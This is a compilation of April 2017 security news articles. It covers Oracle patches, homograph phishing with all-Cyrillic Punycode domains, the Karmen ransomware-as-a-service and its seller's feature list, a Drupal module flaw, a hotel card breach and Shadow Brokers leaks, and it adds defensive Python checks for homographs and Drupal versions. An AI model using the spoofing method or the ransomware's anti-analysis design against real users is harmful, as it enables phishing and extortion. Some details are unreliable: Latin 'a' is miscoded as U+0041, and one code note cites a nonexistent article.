Released this week, Oracle’s latest CPU addressed vulnerabilities in 25 product families: MySQL and Retail Applications (39 fixes each), Fusion Middleware (31), Sun Systems Products Suite (21), PeopleSoft (16), Virtualization (15), Berkeley DB (14), Support Tools (13), E-Business Suite (11), Communications Applications (11), Java SE (8), Utilities Applications (7), Primavera Products Suite (7), Hospitality Applications (6), Commerce (3), Database Server (2), Enterprise Manager Grid Control (2), and Secure Backup, Hyperion, Supply Chain Products Suite, JD Edwards Products, Siebel CRM, Health Sciences Applications, and Insurance Applications (1 each).

The most important of the addressed issues relate to the remote code execution flaw in Apache Struts 2 that was found last month to be exploited in the wild after someone published a proof-of-concept (PoC) exploit. Cisco and VMware products were impacted as well.

“Cybercrime has always been a lucrative business. Nowadays, hackers set their eyes on enterprises more than on individuals, as they understood that it is more profitable. Taking into account that Oracle’s products are installed in the largest enterprises, these applications can be the ultimate target. The good news is that the vendor drew its attention to this critical area before a serious data breach happens. The bad news is that Oracle admins will long work on installing numerous patches,” Alexander Polyakov, CTO at ERPScan, says.

Oracle addressed critical bugs in the Solaris component of Oracle Sun Systems Products Suite, MySQL Enterprise Monitor component of Oracle MySQL (Struts 2), Oracle FLEXCUBE Private Banking component of Oracle Financial Services Applications (Struts 2), Oracle Financial Services Asset Liability Management component of Oracle Financial Services Applications (Struts 2), and Oracle Financial Services Data Integration Hub component of Oracle Financial Services Applications (Struts 2).

Over the past several quarters, Oracle has been patching an increasingly high number of vulnerabilities with each new CPU. With 276 patches, the July 2016 CPU was the first to include over 250 fixes, and the trend continued in each quarter since, with 253 flaws addressed in October 2016 and 270 in January 2017.

The trend is expected to continue in the following quarters. As is usually the case with software, this does not mean the applications are becoming more vulnerable, but that the research community is getting better at finding security issues.


Many Cybercriminals Prefer Skype for Communications: Study

19.4.2017 securityweek  CyberCrime
Cybercriminals are increasingly interested in ensuring that their communications are encrypted, and the favorite tool of many appears to be Microsoft’s Skype, according to a new report from threat intelligence firm Flashpoint.

Data collected by Flashpoint from deep and dark web cybercrime communities between 2012 and 2016 shows that ICQ, Skype, Jabber, PGP, AOL Instant Messenger, Telegram, WeChat, QQ, WhatsApp, and Kik have been the most widely used tools.

The company’s study is based on the number of mentions on Russian, Spanish, French, Arabic, Chinese, Persian (Farsi) and English language forums typically used by profit-driven cybercriminals. The study does not include Signal and Line because these are common words in English and in programming languages, but the researchers believe their usage by threat actors is insignificant.

An analysis of Russian underground websites showed that ICQ was the most popular back in 2012 and accounted for more than half of mentions. Skype and Jabber also accounted for 26% and 19% of mentions, respectively. By 2016, Skype became the most mentioned messaging tool, with Jabber and ICQ dropping to the second and third positions.

On Spanish-speaking forums, Skype was in the lead in 2012, but last year it dropped to second place. The most mentioned messaging platform in 2016 was ICQ, with more than half of mentions.

Researchers believe ICQ has become more popular among Spanish-speaking cybercrooks due to the influence of more sophisticated hackers from Russian communities. In fact, Russian actors are considered the most innovative and sophisticated, and they are often trendsetters.

As for French-speaking communities, PGP was the most referenced in 2012, with nearly 60% of the total mentions. While not actually a messaging service, Flashpoint decided to include it in its study due to its popularity.

PGP continued to be popular on the French underground, but Jabber took the lead in 2016. Experts believe cybercriminals had started using it alongside PGP.

Skype was the most popular on Arabic-language forums back in 2012. WhatsApp was the most referenced last year, but Skype still managed to remain one of the favorites.

The situation has been different in China, where cybercriminals prefer applications developed by local tech company Tencent. Its QQ and WeChat apps accounted for more than 90% of mentions, both in 2012 and last year.

Persian-language communities also don’t appear to be influenced by others as much. In 2012, Yahoo Messenger was the most popular, and the favorite in 2016 was Telegram, with nearly 90% of all mentions. It’s worth noting that Flashpoint’s analysis of the Iranian underground is more general and it does not focus on financially motivated cybercrime.

On English-language underground websites, Skype was and remains the most mentioned application. In fact, Skype appears to be the most popular overall, being included in the top five messengers in all language groups.

According to Flashpoint, its study also shows that cybercriminals are increasingly interested in encrypted communications, a trend that is likely due to recent revelations of NSA surveillance, the proliferation of secure chat apps, and the influence of more sophisticated actors.

“The results of this study underscore the interconnected, agile nature of the cybercriminal ecosystem. Regardless of their language, skills, location, or affiliation, cybercriminal groups tend to share a strong desire to reap the benefits of cross-community collaboration, information sharing, and even mentorship,” Flashpoint said in its report.

“Such activities necessitate consistent access to reliable means of communication, which is why the digital communication tools examined within this study play such an integral role in facilitating cybercriminal behavior. In many instances, a cybercriminal’s livelihood may depend on his or her ability to communicate with peers while evading third-party detection. As such, the decision to utilize one communication tool over others is not taken lightly and often influenced by numerous contextual social, cultural, and geopolitical factors,” the company added.


Kaspersky Adds Password Manager to Bug Bounty Program

19.4.2017 securityweek  Vulnerebility
Kaspersky Lab has informed researchers that its bug bounty program has been extended. The company has also decided to add a new product to its program and increase the maximum reward.

Kaspersky launched its HackerOne-powered bug bounty program in August 2016. The first phase, which lasted for six months and promised a total of $50,000 in bounties, led to the discovery of more than 20 flaws.

Given the program’s success so far, the security firm has decided to extend it and make some changes. Bug bounty hunters can now earn rewards for finding vulnerabilities in Kaspersky Password Manager 8. Until now, only Kaspersky Internet Security 2017 and Kaspersky Endpoint Security 10 were in scope.

The security firm also announced that the maximum reward for remote code execution vulnerabilities has been increased from $2,000 to $5,000. White hat hackers can earn, on average, $1,000 for local privilege escalation flaws and $2,000 for sensitive information disclosure issues. The minimum reward is $300.

“Since August, it is fair to say that our Bug Bounty Program has been successful in optimising our internal and external mitigation measures to continuously improve the resiliency of our products. That’s why we’ve decided to extend it,” said Nikita Shvetsov, Chief Technology Officer at Kaspersky Lab.

“We appreciate the enthusiastic participation of security researchers worldwide. As a mark of our respect for the work they do in helping us to bolster our solutions, we’ve increased the remuneration on offer in this second phase of the program and extended the scope to include other important Kaspersky Lab products,” Shvetsov added.

Google Project Zero researcher Tavis Ormandy has reported finding several vulnerabilities in Kaspersky products in the past years. The most recent, disclosed in January, was related to how the security firm’s products inspect SSL/TLS connections.


Chrome, Firefox Users Exposed to Unicode Domain Phishing

19.4.2017 securityweek Phishing
Malicious actors can create legitimate-looking phishing domains by leveraging the fact that some popular web browsers fail to properly protect their users against homograph attacks.

Web developer Xudong Zheng has demonstrated how an attacker could register a domain name such as “xn--80ak6aa92e.com,” which web browsers such as Chrome, Opera and Firefox render as the Cyrillic string “аррӏе.com”, visually indistinguishable from “apple.com.”

Unicode is a standard for encoding and representing the characters and glyphs of all languages. Unicode characters can be used in Internet hostnames through Punycode, an ASCII encoding recognizable by its “xn--” prefix. For instance, the Chinese word “短” is equivalent to “xn--s7y.”

Characters such as the Cyrillic “а” (U+0430) and the Latin “a” (U+0061) may look the same, but they are different code points and are therefore represented differently in Punycode, which allows malicious actors to create domains in which Latin letters are replaced with similar-looking Greek or Cyrillic characters. This is known as an internationalized domain name (IDN) homograph attack.

Modern web browsers are designed to prevent these attacks: for example, “xn--pple-43d.com”, which mixes a Cyrillic “а” with Latin letters, is displayed as “xn--pple-43d.com” instead of “apple.com.” However, Zheng discovered that this mixed-script filter can be bypassed in Chrome, Firefox and Opera by building the entire domain name from Cyrillic characters, so that “xn--80ak6aa92e.com” is displayed as what looks like “apple.com.”

For a proof-of-concept (PoC), the expert registered the domain “xn--80ak6aa92e.com” and obtained a free digital certificate for it from Let’s Encrypt. When the domain is accessed via Opera, Chrome or Firefox, the user sees what appears to be “apple.com” in the address bar, along with a valid certificate whose subject renders the same way.

Wordfence has demonstrated the attack technique by spoofing the healthcare website “epic.com,” and experts at SANS have also provided some examples.

Zheng reported his findings to Google and Mozilla on January 20, and while the upcoming Chrome 58 will resolve the issue, Mozilla is still trying to figure out how to address the problem.

Mozilla initially classified the vulnerability report as “WONTFIX,” but later reopened it and assigned it a low severity rating. Until the organization comes up with a fix, Firefox users can protect themselves against potential attacks by typing “about:config” in the address bar to access advanced settings, and changing the “network.IDN_show_punycode” preference to “true.”

Edge, Internet Explorer and Safari are not affected. However, it’s worth noting that researchers did report recently that cybercriminals had been targeting Office 365 business email users by exploiting a weakness in how Office 365 handles Punycode.
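The fix Chrome 58 ships, and the one a cautious address bar (or a URL filter in a mail gateway) should apply, is to show raw Punycode whenever a label is confusable. The following added example is not Zheng’s code nor any browser’s implementation; it decodes the Punycode labels discussed above and in the Security Affairs write-up of the same technique further down the page, then flags a label either because it mixes scripts (the “xn--pple-43d” case) or because every letter is a Cyrillic lookalike of an ASCII letter (the “xn--80ak6aa92e” case). The lookalike table is a hand-picked subset for illustration, not the full Unicode confusables list, and the script detection is a deliberately crude reading of the Unicode character name.

```python
import unicodedata

# Cyrillic letters that render like ASCII letters in common fonts. Hand-picked
# subset for this example; the real confusables table is far larger.
CYRILLIC_LOOKALIKES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0443": "y", "\u0445": "x", "\u04cf": "l", "\u0501": "d", "\u04bb": "h",
    "\u0456": "i", "\u0458": "j", "\u0455": "s", "\u051b": "q", "\u051d": "w",
    "\u0475": "v",
}


def decode_idn(host):
    """Turn each xn-- (Punycode) label of a hostname back into Unicode,
    e.g. 'xn--s7y.com' -> '短.com'. Labels without the prefix pass through."""
    labels = []
    for label in host.lower().split("."):
        if label.startswith("xn--"):
            label = label[4:].encode("ascii").decode("punycode")
        labels.append(label)
    return ".".join(labels)


def _script(ch):
    """Crude script name taken from the first word of the Unicode character name:
    'CYRILLIC', 'LATIN', 'CJK', 'GREEK', ..."""
    return unicodedata.name(ch, "UNKNOWN").split()[0]


def homograph_risk(label):
    """Return a reason string if the label could impersonate an ASCII name, else None."""
    letters = [c for c in label if c.isalpha()]
    if all(ord(c) < 128 for c in letters):
        return None  # plain ASCII label, nothing to confuse
    scripts = {_script(c) for c in letters}
    if len(scripts) > 1:
        return "mixed scripts: " + ", ".join(sorted(scripts))
    if scripts == {"CYRILLIC"} and all(c in CYRILLIC_LOOKALIKES for c in letters):
        ascii_twin = "".join(CYRILLIC_LOOKALIKES[c] for c in letters)
        return "whole-script confusable, reads as '%s'" % ascii_twin
    return None  # single non-Latin script with no ASCII twin, e.g. '短'


def display_host(host):
    """What a cautious address bar should show: Unicode for safe IDNs,
    the raw Punycode whenever any label is confusable."""
    unicode_host = decode_idn(host)
    for label in unicode_host.split("."):
        if homograph_risk(label):
            return host.lower()
    return unicode_host


if __name__ == "__main__":
    for h in ("xn--80ak6aa92e.com", "xn--pple-43d.com", "xn--s7y.com", "apple.com"):
        print(h, "->", decode_idn(h), "| shown as:", display_host(h))
```

The whole-script rule is the part the mixed-script check alone misses: “аррӏе” is internally consistent (all Cyrillic), so it is the comparison against a lookalike table, not the script count, that catches it.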


Karmen Ransomware Deletes Decryptor If Sandbox is Detected

19.4.2017 securityweek Ransomware

Karmen Ransomware Deletes Decryptor Component When Detecting a Sandbox Environment or Analysis Software

A recently discovered Hidden Tear ransomware offspring is being sold on underground forums as a Ransomware-as-a-Service (RaaS), priced at just $175, Recorded Future researchers reveal.

Dubbed Karmen, the malware appears to have been around since December 2016, when incidents involving it were reported in Germany and the United States. However, the threat started being advertised on underground forums only in March.

After a closer look at the malware, Recorded Future’s researchers found that it is derived from the Hidden Tear open-source ransomware and uses AES-256 to encrypt targeted files on the local machine.

Like any other ransomware, the threat displays a ransom note instructing the victim to pay a specific sum of money to obtain the decryption key. Unlike other similar threats, however, the malware automatically deletes the decryptor when it detects a sandbox environment or analysis software.

Wannabe-criminals buying the ransomware are provided the option to change various settings courtesy of a control panel that doesn’t require advanced technical knowledge to operate. They can also track infected systems via a “Clients” page. A Dashboard offers information such as the number of infected machines, earned revenue, and available updates for the malware.

Karmen is a multi-threaded, multi-language piece of ransomware that supports .NET 4.0 and newer versions and features an adaptive admin panel, researchers say. The malware can encrypt all disks and files, automatically deletes the loader, and features sandbox, debugger, and virtualization detection. Karmen can delete itself after the ransom is paid, but also deletes the decryptor if it detects it is being analyzed.

The threat is sold in two versions, Light and Full. The former includes only obfuscation and an autoloader, while the latter also packs the anti-analysis capabilities. Besides the .NET dependency of the malware itself, the management panel requires PHP 5.6 and MySQL.


Flaw in Drupal Module Exposes 120,000 Sites to Attacks

19.4.2017 securityweek Vulnerebility
A critical vulnerability has been found in a Drupal module used by many websites. While the flaw has been fixed, Drupal developers initially advised users to migrate as the affected module had not been updated for several years.

The Drupal security team informed users on April 12 that the third-party module named References was affected by a critical security hole. The module, currently used by more than 121,000 websites, allows users to add references between nodes for more complex information architectures.

References was initially flagged by Drupal developers as unsupported due to the fact that it had received its last update in February 2013. However, on April 14, the Drupal security team announced that they may have found a new maintainer for the module.

On Tuesday, Drupal announced that the vulnerability has been fixed with the release of References 7.x-2.2, which also includes new features and bug fixes.

Drupal’s security team has not released any information on the vulnerability to prevent exploitation, but experts are concerned that malicious actors could manage to find the flaw on their own by analyzing the source code. Drupal said it will release information on this weakness in the next few weeks.

While the References module appears to have found a new maintainer, Drupal website owners can also try out Entity Reference, a module that provides similar functionality. A special module is available for migrating from References to Entity Reference.

Hackers have been known to target Drupal websites using vulnerabilities in third-party modules. Last year, researchers started seeing attempts to exploit a RESTWS module flaw two months after it had been patched.

The most well-known Drupal vulnerability is the one dubbed “Drupalgeddon,” which had still been exploited nearly two years after a patch was released.
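Both this article and the Security Affairs piece above give the practitioner one concrete fact to act on: the fix shipped in References 7.x-2.2. The following added example (not Drupal’s or the References project’s code) reads the version line that drupal.org’s packaging script writes into a packaged module’s `.info` file and reports whether the installed copy predates the fixed release. The `.info` excerpt is constructed for the example; a module checked out from git has no such line, and the check treats that case as “update needed” rather than guessing.

```python
import re

# Constructed excerpt of a packaged Drupal 7 module .info file (not the real
# References file). drupal.org's packaging script appends the version, core
# and project lines when it builds a release tarball.
SAMPLE_INFO_FILE = """\
name = References
description = Reference fields between nodes (constructed sample)
core = 7.x
package = Fields

; Information added by Drupal.org packaging script
version = "7.x-2.1"
core = "7.x"
project = "references"
"""

FIXED_RELEASE = "7.x-2.2"  # first release containing the fix, per the advisory

# core.x-major.patch with an optional pre-release suffix, e.g. 7.x-2.2-beta1,
# or a development snapshot such as 7.x-2.x-dev.
_VERSION_RE = re.compile(r"^(\d+)\.x-(\d+)\.(\d+|x)(?:-([a-z]+\d*))?$")


def parse_version(version):
    """'7.x-2.1' -> (7, 2, 1, 1). Pre-releases sort below the final release with
    the same numbers (last element 0), and a '.x-dev' snapshot gets patch -1."""
    m = _VERSION_RE.match(version.strip().strip('"'))
    if not m:
        raise ValueError("unrecognised Drupal version string: %r" % version)
    core, major, patch, suffix = m.groups()
    patch = -1 if patch == "x" else int(patch)
    return (int(core), int(major), patch, 0 if suffix else 1)


def installed_version(info_text):
    """Return the packaging-script 'version = "..."' value, or None for an
    unpackaged checkout."""
    for line in info_text.splitlines():
        m = re.match(r'\s*version\s*=\s*"?([^"\s]+)"?', line)
        if m:
            return m.group(1)
    return None


def needs_update(info_text, fixed=FIXED_RELEASE):
    """True if the installed release predates the fix or cannot be determined."""
    version = installed_version(info_text)
    if version is None:
        return True  # unknown version: assume vulnerable until verified
    return parse_version(version) < parse_version(fixed)


if __name__ == "__main__":
    print("installed:", installed_version(SAMPLE_INFO_FILE),
          "needs update:", needs_update(SAMPLE_INFO_FILE))
```

On a real site the file to read is `sites/all/modules/references/references.info` (or wherever the module is installed); the comparison is deliberately conservative, so a `-dev` snapshot is reported as needing review even if it was built after the fix.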


InterContinental Hotels Group, the international hotel chain confirmed a second credit card breach
19.4.2017 securityaffairs Incindent

The InterContinental Hotels Group announced last week that payment card systems at more than 1,000 of its hotels had been compromised by crooks.
The multinational hotel chain owns prestigious brands like Holiday Inn and Crowne Plaza.

This is the second time the InterContinental Hotels Group has suffered a credit card breach. Early this year the hotel chain informed its customers that payment cards used between August and December 2016 at the restaurants and bars of 12 US hotels had been affected by a data breach; the affected properties included the InterContinental San Francisco, the Holiday Inn Resort Aruba and the InterContinental Chicago Magnificent Mile.

On Friday the company published a credit card breach notification on its website informing its customers that a second breach had occurred at select hotels between September 29 and December 29 last year.

“Many IHG-branded locations are independently owned and operated franchises, and certain of these franchisee operated locations in the Americas were made aware by payment card networks of patterns of unauthorized charges occurring on payment cards after they were legitimately used at their locations. To ensure an efficient and effective response, IHG hired a leading cyber security firm on behalf of franchisees to coordinate an examination of the payment card processing systems of franchise hotel locations in the Americas region.” reads the announcement published by the InterContinental Hotels Group.

“The investigation identified signs of the operation of malware designed to access payment card data from cards used onsite at front desks at certain IHG-branded franchise hotel locations between September 29, 2016 and December 29, 2016. Although there is no evidence of unauthorized access to payment card data after December 29, 2016, confirmation that the malware was eradicated did not occur until the properties were investigated in February and March 2017. “

The company stressed that there is no evidence payment card data was accessed after December 29, 2016, even though the malware was not confirmed eradicated until the properties were investigated in February and March 2017.

The malware that infected the systems at the InterContinental Hotels Group siphoned track data from the magnetic stripe of payment cards (i.e., the card number, expiration date and internal verification code, sometimes together with the cardholder name).

“The malware searched for track data (which sometimes has cardholder name in addition to card number, expiration date, and internal verification code) read from the magnetic stripe of a payment card as it was being routed through the affected hotel server. There is no indication that other guest information was affected. ” continues the credit card breach notification.

The number of properties affected by the second breach is still unclear; customers can use a free web tool published by the company to search for potentially affected hotels in select states (US and Puerto Rico) and cities.

Data provided by the online tool suggests that more than a thousand hotels were affected by the incident.

The company confirmed that the investigation is still ongoing and that it will periodically update the data provided by the tool according to its findings.

The bad news is that several properties did not participate in the investigation.

In response to the incidents, the company is improving security of its payment systems in order to repel malware-based attacks.

The hotels affected by this second breach had not yet implemented the announced improvement.

“Before this incident began, many IHG-branded franchise hotel locations had implemented IHG’s Secure Payment Solution (SPS), a point-to-point encryption payment acceptance solution. Properties that had implemented SPS before September 29, 2016 were not affected. Many more properties implemented SPS after September 29, 2016, and the implementation of SPS ended the ability of the malware to find payment card data and, therefore, cards used at these locations after SPS implementation were not affected.” reads the announcement.


Homograph Phishing Attacks are almost impossible to detect on major browsers
19.4.2017 securityaffairs Phishing

The Chinese security researcher Xudong Zheng is warning that homograph phishing attacks are “almost impossible to detect”, even for experts.
The Chinese security researcher Xudong Zheng has devised a phishing technique that is “almost impossible to detect.”

Hackers can exploit a known vulnerability in the popular web browsers Chrome, Firefox and Opera to display fake domain names to users as if they belonged to legitimate services, like Apple and Google.

This attack is known as a homograph attack: hackers can register domains such as “xn--pple-43d.com”, which is equivalent to “аpple.com”. This is possible if the address uses characters from a foreign language, for example the Cyrillic “а” (U+0430) rather than the ASCII “a” (U+0041).

To get an idea of the technique reported by Zheng, take a look at the demo web page created by the expert.

Well, it displays in the address bar the URL

https://www.apple.com/

and also uses the HTTPS protocol.

However, if you try to copy and paste the URL in another page you will see the following address:

https://www.xn--80ak6aa92e.com/

So, if the displayed page is a clone of the legitimate one, a user has no reason to doubt its authenticity.


Although the homograph attack has been known since 2001, major browsers still haven’t solved the issue and are still vulnerable to homograph phishing attacks.

“Chrome’s (and Firefox’s) homograph protection mechanism unfortunately fails if every character is replaced with a similar character from a single foreign language. The domain “аррӏе.com”, registered as “xn--80ak6aa92e.com”, bypasses the filter by only using Cyrillic characters.” Xudong Zheng said in a blog post. “You can check this out yourself in the proof-of-concept using Chrome or Firefox. In many instances, the font in Chrome and Firefox makes the two domains visually indistinguishable. It becomes impossible to identify the site as fraudulent without carefully inspecting the site’s URL or SSL certificate. This program nicely demonstrates the difference between the two sets of characters. Internet Explorer and Safari are fortunately not vulnerable.”

Another PoC page was created by researchers at the security firm Wordfence; in this case, the experts spoofed the “epic.com” domain.

Major web browsers use ‘Punycode’ encoding by default to represent Unicode characters in the URL.

Punycode converts Unicode characters to the limited character set of ASCII (A-Z, 0-9) supported by the International Domain Names (IDN) system.
The Chinese domain “短.co” is represented in Punycode as “xn--s7y.co”. The xn-- prefix, aka the ‘ASCII compatible encoding’ prefix, tells the web browser that the domain uses Punycode encoding to represent Unicode characters.

The flaw reported by the Chinese researcher could be exploited to register a domain having characters that are interpreted by major browsers in the wrong way. This trick could allow bypassing phishing protections implemented by several browsers, including Chrome, Firefox, and Opera.

Zheng reported this issue to the affected browser vendors early this year. Google has solved the problem in the experimental Chrome Canary 59 and will release a stable fix with the release of Chrome Stable 58.

While waiting for a fix, the only way to prevent homograph phishing attacks is to disable Punycode support in your web browser; unfortunately only Firefox allows it.

“Firefox users can limit their exposure to this bug by going to about:config and setting network.IDN_show_punycode to true. This will force Firefox to always display IDN domains in its Punycode form, making it possible to identify malicious domains. Thanks to /u/MARKZILLA on reddit for this solution.” wrote Zheng.

“A simple way to limit the damage from bugs such as this is to always use a password manager. In general, users must be very careful and pay attention to the URL when entering personal information. I hope Firefox will consider implementing a fix to this problem since this can cause serious confusion even for those who are extremely mindful of phishing.”


Karmen Ransomware, a cheap RaaS service that implements anti-analysis features
18.4.2017 securityaffairs Ransomware

Experts at Recorded Future have discovered a cheap RaaS, the Karmen ransomware, that deletes its decryptor if it detects a sandbox.
Security experts from threat intelligence firm Recorded Future have spotted a new ransomware-as-a-service (RaaS) called Karmen. The service allows customers to easily create their ransomware campaign in a few steps and without specific skills.

Wannabe crooks can also track infected systems via a “Clients” tab; the dashboard is an efficient and easy-to-use cockpit that includes information such as the number of infected machines, earned revenue, and available updates for the malware.

The Karmen RaaS is very cheap, costing just $175; buyers can decide the ransom price and the duration of the period in which victims can pay the ransom.

The Karmen ransomware is based on the open-source ransomware Hidden Tear, which was released in August 2015 by the Turkish security researcher Utku Sen for educational purposes.

The first Karmen infections were reported in December 2016, the malware infected machines in Germany and the United States.

The Karmen ransomware is a multi-threaded and multi-language ransomware that supports .NET 4.0 and uses the AES-256 encryption standard.

The malware is .NET dependent and requires PHP 5.6 and MySQL.

“On March 4, 2017, a member of a top-tier cyber criminal community with the username “Dereck1” mentioned a new ransomware variant called “Karmen.”” reads a blog post published by Recorded Future.

“Further investigation revealed that “DevBitox,” a Russian-speaking cyber criminal, was the seller behind the Karmen malware on underground forums in March 2017.”

“However, the first cases of infections with Karmen were reported as early as December 2016 by victims in Germany and the United States.”

Once it has infected a machine, the ransomware displays a ransom note with payment instructions; unlike similar malware, Karmen automatically deletes the decryptor when it detects a sandbox environment or any other analysis software.

“A notable feature of Karmen is that it automatically deletes its own decryptor if a sandbox environment or analysis software is detected on the victim’s computer.” continues the blog post.

Below is the list of ransomware features provided by DevBitox:

Multi-threaded
Multi-language
Supports .NET 4.0 and newer versions
Encryption algorithm: AES-256
Adaptive admin panel
Encrypts all discs and files
Separate BTC wallet for each victim
Small size
Automatic deletion of loader
Automatic deletion of malware (after payment was received)
Minimal connection with control server
Robust control panel
Almost FUD (1/35)
Automatic file decryption after received payment
T2W compatible
File extensions remain the same
Detection of anti-debugger/analyzers/VM/sandbox
Automatic deletion of decryptor if sandbox environment is detected on victim’s computer*
Light version: obfuscation and autoloader only
Full version: detection of analyzing software
The ransomware is available for sale in both a light and a full version; the light version doesn’t include the anti-analysis features.


Moving threat landscape: The reality beyond the cyberwarfare
18.4.2017 securityaffairs CyberWar

It started quietly as a probability, not a reality. Now, within months, cyberwarfare has become a reality as plausible as the air we breathe.
The revelation of government hacking units has brought to light a new domain of conflict: cyberwarfare. Once secret, these government units were publicly revealed, such as the Equation Group and the Tailored Access Operations (TAO) unit.

The same tools that are the subject of debates about digital privacy are operating as you read this, in some digital battle over the internet. This is only the tip of the iceberg, and with every further disclosure we realize that every technology is a risk waiting to happen.


Beyond the inevitable costs for the global economy, the risks for human life are as certain as the damage caused by physical weapons. One simple program can turn a surveillance camera, a cellphone, a television, or any other connected device into a weapon in a network that can massively disrupt critical infrastructure services.

Nowadays the development of new cryptologic technologies, the implementation of information security frameworks, and awareness are the only guarantees humanity has to protect itself. If we consider the impact of a massive attack on critical infrastructure, we must also consider that every single service will stop and no one will be able to call for help.

More disturbing than the impact of such attacks is the reality that they are already taking place.

The news of North Korea failing to launch a missile due to a US Cyber Command attack brings a new level of threat landscape and theater of operations for information security. Today the human domain is a target of these cyber operations, and apparently every aspect of society can suffer damage, like hospitals or even the power grid.

We see today a completely new market of jobs and opportunities emerging alongside these threats, to protect us from rogue nation-state actors. Corporations and partners need to unite with law enforcement agencies to develop new tools and to raise awareness among average citizens. A new framework for cyber security and pre-emptive readiness has to be taken into account as the first priority by every democratic country connected to the internet.

The US sabotage of the North Korean missile is not the only news about cyberwarfare. The Mirai botnet and the dangers of IoT are another example of this ongoing threat, in the blink of an eye, at the click of a button. As technologies evolve, we also must evolve the countermeasures to contain those threats. The possibility of state actors managing to interfere in democratic republics confirms the impact on civil society, which can damage a whole nation and the world, as with the Russian interference in Europe that was in the news.

We are on the verge of a drastic change in awareness and preparedness in the cyber domain, and we must prepare ourselves for this new reality as it reaches out and affects everyone, everywhere. With the development of new information security technologies, job creation can be a reality emerging from the chaos of destruction launched upon us as menaces from these rogue states.

It has been the legacy of computer science to bring humanity to its best and worst in history. As of today, we must change that reality by advancing the importance of security and the development of new technologies to withstand such menaces with no cost at all in human lives.



The alleged link between the Shadow Brokers data leak and the Stuxnet cyber weapon
18.4.2017 securityaffairs BigBrothers

Security researchers who analyzed the documents and hacking tools included in the last Shadow Brokers dump found a link to the Stuxnet virus.
On Friday, the Shadow Brokers leaked a new bunch of files belonging to the alleged NSA arsenal.

Security researchers who analyzed the documents and hacking tools included in the last dump have discovered many exploits specifically designed to compromise Windows systems.

Digging into the archive, experts spotted a surprising exploit that was used in the Stuxnet cyber weapon, the malware used to destroy the Iranian nuclear programme at the Natanz plant.

According to Symantec researcher Liam O’Murchu, the exploit was developed for Windows’ MOF files and it is “almost the exact same script” used in Stuxnet.

“There is a strong connection between Stuxnet and the Shadow Brokers dump,” O’Murchu told Motherboard in an email. “But not enough to definitively prove a connection.”
Let’s see the similarities between the Stuxnet code and the exploit code in the last dump leaked by Shadow Brokers.

Below is a portion of the script from Stuxnet, followed by a portion of the script dumped by The Shadow Brokers (screenshot: Stuxnet code vs Shadow Brokers exploit).


Of course, whoever developed the tool included in the Shadow Brokers dump may have borrowed the script from public knowledge of Stuxnet. The same code, for example, was included in the Metasploit framework, allowing anyone to create a MOF file like the one exploited in the Stuxnet attack.

O’Murchu highlighted that the MOF file creation tool in the Shadow Brokers dump had a last-compiled date of September 9, 2010, a few months after Stuxnet’s discovery but “shortly before the code was added to Metasploit.”

The researcher Kevin Beaumont believes that there is a link between Stuxnet and the exploit shared by Shadow Brokers.

Kevin Beaumont (@GossiTheDog) tweeted on 14 Apr 2017: “lol I think this one I just found is one of the exploits used in Stuxnet, even notes patch num”
Lorenzo Franceschi-Bicchierai from Motherboard also reported that Avast Antivirus detects some exploits in the Shadow Brokers dump as Stuxnet.

It is very curious that, even in the case of a false positive, the signatures of the exploits match Stuxnet’s.

Are we facing evidence that the NSA-linked Equation Group was involved in the Stuxnet attack, or is this a well-organized false-flag operation?
“Therefore, the Stuxnet MOF file creation tool that the Shadow Brokers dropped on Friday is possibly the earliest technical evidence that NSA hackers and developers coded Stuxnet, as many suspect.” added Franceschi-Bicchierai.


VMware Patches Critical RCE Flaw in vCenter Server

18.4.2017 securityaffairs Vulnerability

VMware has released patches for its vCenter Server product to address a critical remote code execution flaw that exists due to the use of a vulnerable third-party component.

Earlier this month, CERT/CC informed users that Markus Wulftange, senior penetration tester at Code White, had identified three potentially serious deserialization-related flaws in several Java implementations of AMF3, the latest version of Adobe’s Action Message Format.

The vulnerabilities can be exploited for denial-of-service (DoS) attacks, remote code execution and to obtain sensitive data. The affected software includes Apache’s Flex BlazeDS, Atlassian’s JIRA, Exadel’s Flamingo, GraniteDS, Spring spring-flex, and WebORB for Java by Midnight Coders.

One of the BlazeDS vulnerabilities, tracked as CVE-2017-5641, has been found to affect VMware vCenter Server, which uses BlazeDS to process AMF3 messages.

“The issue is present in the Customer Experience Improvement Program (CEIP) functionality. If a customer has opted out of CEIP the vulnerability is still present. Also opting out will not remove the vulnerability,” VMware said in its advisory.

The security hole affects vCenter Server 6.0 and 6.5; version 5.5 or other VMware products are not impacted. VMware has advised users to apply the 6.5c and 6.0U3b patches to address the vulnerability.

According to CERT/CC, the deserialization vulnerabilities identified by Wulftange could also affect products from HPE and SonicWall.


This Phishing Attack is Almost Impossible to Detect On Chrome, Firefox and Opera

18.4.2017 thehackernews Phishing

A Chinese infosec researcher has discovered a new "almost impossible to detect" phishing attack that can be used to trick even the most careful users on the Internet.
He warned that hackers can use a known vulnerability in the Chrome, Firefox and Opera web browsers to display their fake domain names as the websites of legitimate services, like Apple, Google, or Amazon, to steal login or financial credentials and other sensitive information from users.
What is the best defence against phishing attack? Generally, checking the address bar after the page has loaded and if it is being served over a valid HTTPS connection. Right?
Okay, then before going to the in-depth details, first have a look at this demo web page (note: you may experience downtime due to high traffic on demo server), set up by Chinese security researcher Xudong Zheng, who discovered the attack.
“It becomes impossible to identify the site as fraudulent without carefully inspecting the site's URL or SSL certificate.” Xudong Zheng said in a blog post.
If your web browser is displaying "apple.com" in the address bar secured with SSL, but the content on the page is coming from another server (as shown in the above picture), then your browser is vulnerable to the homograph attack.
There is another proof-of-concept website, created by security experts from Wordfence, to demonstrate this browser vulnerability. It spoofs the "epic.com" domain.
Homograph attack has been known since 2001, but browser vendors have struggled to fix the problem. It’s a kind of spoofing attack where a website address looks legitimate but is not because a character or characters have been replaced deceptively with Unicode characters.
Many Unicode characters, which represent alphabets like Greek, Cyrillic, and Armenian in internationalised domain names, look the same as Latin letters to the casual eye but are treated by computers as completely different web addresses.
For example, Cyrillic "а" (U+0430) and Latin "a" (U+0041) are treated as different by browsers, but both are displayed as "a" in the address bar.
Punycode Phishing Attacks

By default, many web browsers use ‘Punycode’ encoding to represent Unicode characters in the URL to defend against Homograph phishing attacks. Punycode is a special encoding used by the web browser to convert Unicode characters to the limited character set of ASCII (A-Z, 0-9), supported by International Domain Names (IDNs) system.
For example, the Chinese domain "短.co" is represented in Punycode as "xn--s7y.co".
